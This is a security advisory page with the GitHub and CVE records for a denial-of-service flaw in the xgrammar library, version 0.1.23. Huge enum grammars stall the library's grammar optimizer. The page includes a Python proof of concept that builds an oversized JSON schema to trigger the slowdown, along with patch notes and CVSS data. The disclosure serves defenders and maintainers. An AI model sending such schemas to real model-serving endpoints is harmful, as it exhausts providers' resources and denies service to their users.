github - ghsa-9q5r-wfvf-rr7f

ghsa-9q5r-wfvf-rr7f

Vulnerability from github

Published

2025-09-05 21:10

Modified

2025-09-10 20:51

Severity

6.9 (Medium) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
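The vector string above can be read metric by metric. The following is a minimal sketch of splitting it into its components; the helper name `parse_cvss_vector` is illustrative and not part of any CVSS library.

```python
def parse_cvss_vector(vector: str) -> dict[str, str]:
    """Split a CVSS vector string into {metric: value} pairs."""
    prefix, *metrics = vector.split("/")
    if not prefix.startswith("CVSS:"):
        raise ValueError(f"not a CVSS vector: {vector!r}")
    parsed = {"version": prefix.split(":", 1)[1]}
    for item in metrics:
        name, value = item.split(":", 1)
        parsed[name] = value
    return parsed


vector = "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
metrics = parse_cvss_vector(vector)

# Collect the impact metrics that are not "N" (None).
impact_names = ("VC", "VI", "VA", "SC", "SI", "SA")
impacted = [name for name in impact_names if metrics[name] != "N"]
print(impacted)  # ['VA']
```

Only `VA` (availability of the vulnerable system) is rated above None, which matches the denial-of-service nature of the issue.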

Summary

xgrammar vulnerable to denial of service by huge enum grammar

Details

Summary

The provided grammar would fit in the context window of most models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine, so this appears to be a regression caused by the Earley parser.

Details

A full reproducer is provided in the PoC section. The resulting grammar is around 70k tokens, and the grammar parsing itself (with the models I checked) took significantly longer than the LLM processing, meaning this can be used to DoS model providers.

Patch

This problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only occurs for very large grammars (>100k characters), such as the one below. v0.1.24 fixes the problem by speeding up the grammar optimizer and disabling some slow optimizations for large grammars.

Thanks to @Seven-Streams
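For deployments that cannot upgrade immediately, one possible stopgap is to reject oversized schemas before they reach grammar compilation. The sketch below is an assumption-laden illustration, not a fix from the xgrammar project: the names `MAX_SCHEMA_CHARS`, `SchemaTooLargeError`, and `check_schema_size` are hypothetical, and the 100,000-character limit simply mirrors the ">100k characters" figure quoted above. The serialized schema length is only a proxy for the size of the resulting grammar.

```python
import json

# Assumption: mirrors the ">100k characters" figure from the advisory.
# This is not a limit defined or enforced by xgrammar itself.
MAX_SCHEMA_CHARS = 100_000


class SchemaTooLargeError(ValueError):
    """Raised when a user-supplied schema exceeds the configured size limit."""


def check_schema_size(schema: dict, limit: int = MAX_SCHEMA_CHARS) -> str:
    """Serialize the schema and refuse it if the JSON text is longer than `limit`."""
    serialized = json.dumps(schema)
    if len(serialized) > limit:
        raise SchemaTooLargeError(
            f"schema is {len(serialized)} characters, limit is {limit}"
        )
    return serialized


# A small schema passes through and can be handed to the grammar compiler.
small = check_schema_size({"type": "string"})

# A schema with a huge enum is rejected before any grammar work is done.
try:
    check_schema_size({"enum": ["A" * 10] * 10_000})
except SchemaTooLargeError as exc:
    print(f"rejected: {exc}")
```

Upgrading to 0.1.24 remains the actual fix; a size limit like this only narrows the exposure.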

PoC

```
import string
import random


def enum_schema(size=10000, str_len=10):
    # One large enum of random uppercase strings, shared by every property.
    enum = {"enum": ["".join(random.choices(string.ascii_uppercase, k=str_len)) for _ in range(size)]}
    schema = {
        "definitions": {
            "colorEnum": enum
        },
        "type": "object",
        "properties": {
            "color1": {"$ref": "#/definitions/colorEnum"},
            "color2": {"$ref": "#/definitions/colorEnum"},
            "color3": {"$ref": "#/definitions/colorEnum"},
            "color4": {"$ref": "#/definitions/colorEnum"},
            "color5": {"$ref": "#/definitions/colorEnum"},
            "color6": {"$ref": "#/definitions/colorEnum"},
            "color7": {"$ref": "#/definitions/colorEnum"},
            "color8": {"$ref": "#/definitions/colorEnum"}
        },
        "required": [
            "color1",
            "color2"
        ]
    }
    return schema


schema_enum = enum_schema()
print(schema_enum)
print(test_schema(schema_enum, {}))
```

where:

```
import json

import xgrammar as xgr
# Assumed import path for the helper used in the report; define test_schema
# before running the snippet above.
from xgrammar.testing import _is_grammar_accept_string


def test_schema(schema, instance):
    grammar = xgr.Grammar.from_json_schema(
        json.dumps(schema),
        strict_mode=True
    )
    return _is_grammar_accept_string(grammar, json.dumps(instance))
```
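To see why this schema falls into the ">100k characters" range mentioned in the Patch section, the size of the serialized enum can be measured without installing xgrammar. This is a rough sketch: the helper `enum_values` is introduced here for illustration and only reproduces the enum-building expression from the PoC, and the length of the JSON text is used as a stand-in for the size of the grammar derived from it.

```python
import json
import random
import string


def enum_values(size=10000, str_len=10):
    """Build the same kind of random enum list the PoC uses."""
    return [
        "".join(random.choices(string.ascii_uppercase, k=str_len))
        for _ in range(size)
    ]


# Serialize just the enum definition, as it would appear inside the schema.
enum_json = json.dumps({"enum": enum_values()})

# 10,000 quoted 10-letter strings plus separators come to about 140,000
# characters, well past the 100k mark.
print(len(enum_json))
print(len(enum_json) > 100_000)  # True
```

The eight `$ref` properties all point at this single definition, so the JSON schema itself stays at roughly this size.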

Impact

Denial of service (DoS).

JSON

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "xgrammar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.1.23"
            },
            {
              "fixed": "0.1.24"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.1.23"
      ]
    }
  ],
  "aliases": [
    "CVE-2025-58446"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-05T21:10:06Z",
    "nvd_published_at": "2025-09-06T19:15:38Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nProvided grammar, would fit in a context window of most of the models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine so this seems to be a regression caused by Earley parser.\n\n### Details\n\nFull reproducer provider in the POC section. The resulting grammar is around 70k tokens, and the grammar parsing itself (with the models I checked) was significantly longer than LLM processing itself, meaning this can be used to DOS model providers.\n\n### Patch\n\nThis problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only happens for very large grammars (\u003e100k characters), like the below one. v0.1.24 solved this problem by optimizing the speed of the grammar optimizer and disable some slow optimization for large grammars. \n\nThanks to @Seven-Streams \n\n### PoC\n```\nimport string\nimport random\n\ndef enum_schema(size=10000,str_len=10):\n    enum =  {\"enum\": [\"\".join(random.choices(string.ascii_uppercase, k=str_len)) for _ in range(size)]}\n    schema = {\n        \"definitions\": {\n            \"colorEnum\": enum\n        },\n        \"type\": \"object\",\n        \"properties\": {\n            \"color1\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color2\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color3\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color4\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color5\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color6\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color7\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color8\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            }\n        
},\n        \"required\": [\n                \"color1\",\n                \"color2\"\n         ]\n    }\n    return schema\n\nschema_enum = enum_schema()\nprint(schema_enum)\nprint(test_schema(schema_enum, {}))\n```\n\nwhere:\n```\ndef test_schema(schema, instance):\n    grammar = xgr.Grammar.from_json_schema(\n        json.dumps(schema),\n        strict_mode=True\n    )\n    return _is_grammar_accept_string(grammar, json.dumps(instance))\n```\n\n### Impact\nDOS",
  "id": "GHSA-9q5r-wfvf-rr7f",
  "modified": "2025-09-10T20:51:27Z",
  "published": "2025-09-05T21:10:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-9q5r-wfvf-rr7f"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58446"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mlc-ai/xgrammar/commit/ced69c3ad2f8f61b516cc278a342e7c644383e27"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mlc-ai/xgrammar"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ],
  "summary": "xgrammar vulnerable to denial of service by huge enum grammar"
}
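The `ranges` entry in the record above says the issue was introduced in 0.1.23 and fixed in 0.1.24. A minimal sketch of checking a version string against such an event list follows. It assumes plain dotted numeric versions and a single introduced/fixed pair; it is not a full PEP 440 or OSV range evaluator, and the function names are illustrative.

```python
def parse_version(version: str) -> tuple[int, ...]:
    """Turn '0.1.23' into (0, 1, 23). Assumes purely numeric components."""
    return tuple(int(part) for part in version.split("."))


def is_affected(version: str, events: list[dict[str, str]]) -> bool:
    """Return True if `version` lies in [introduced, fixed) for one event pair."""
    introduced = None
    fixed = None
    for event in events:
        if "introduced" in event:
            introduced = parse_version(event["introduced"])
        if "fixed" in event:
            fixed = parse_version(event["fixed"])
    if introduced is None:
        return False
    current = parse_version(version)
    return current >= introduced and (fixed is None or current < fixed)


# Events copied from the "ranges" entry of the record above.
events = [{"introduced": "0.1.23"}, {"fixed": "0.1.24"}]

for candidate in ("0.1.16", "0.1.23", "0.1.24"):
    print(candidate, is_affected(candidate, events))
```

With these events only 0.1.23 is reported as affected, which agrees with the `versions` list in the record.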

CVE-2025-58446 (GCVE-0-2025-58446)

Vulnerability from cvelistv5

Published

2025-09-06 19:06

Modified

2025-09-08 17:55

Severity

6.9 (Medium) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

CWE

CWE-770 - Allocation of Resources Without Limits or Throttling

Summary

xgrammar is an open-source library for efficient, flexible, and portable structured generation. A grammar optimizer introduced in 0.1.23 processes large grammars (>100k characters) very slowly, which can be used to cause denial of service (DoS) against model providers. This issue is fixed in version 0.1.24.

References

	URL	Tags
	https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-9q5r-wfvf-rr7f	x_refsource_CONFIRM
	https://github.com/mlc-ai/xgrammar/commit/ced69c3ad2f8f61b516cc278a342e7c644383e27	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	mlc-ai	xgrammar	Version: = 0.1.23, < 0.1.24

JSON

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-58446",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-09-08T17:53:36.884881Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-09-08T17:55:13.537Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "xgrammar",
          "vendor": "mlc-ai",
          "versions": [
            {
              "status": "affected",
              "version": "= 0.1.23, \u003c  0.1.24"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "xgrammar is an open-source library for efficient, flexible, and portable structured generation. A grammar optimizer introduced in 0.1.23 processes large grammars (\u003e100k characters) at very low rates, and can be used for DOS of model providers. This issue is fixed in version 0.1.24."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 6.9,
            "baseSeverity": "MEDIUM",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "LOW",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-770",
              "description": "CWE-770: Allocation of Resources Without Limits or Throttling",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-09-06T19:06:10.141Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-9q5r-wfvf-rr7f",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-9q5r-wfvf-rr7f"
        },
        {
          "name": "https://github.com/mlc-ai/xgrammar/commit/ced69c3ad2f8f61b516cc278a342e7c644383e27",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/mlc-ai/xgrammar/commit/ced69c3ad2f8f61b516cc278a342e7c644383e27"
        }
      ],
      "source": {
        "advisory": "GHSA-9q5r-wfvf-rr7f",
        "discovery": "UNKNOWN"
      },
      "title": "xgrammar vulnerable to denial of service by huge enum grammar"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-58446",
    "datePublished": "2025-09-06T19:06:10.141Z",
    "dateReserved": "2025-09-01T20:03:06.533Z",
    "dateUpdated": "2025-09-08T17:55:13.537Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}
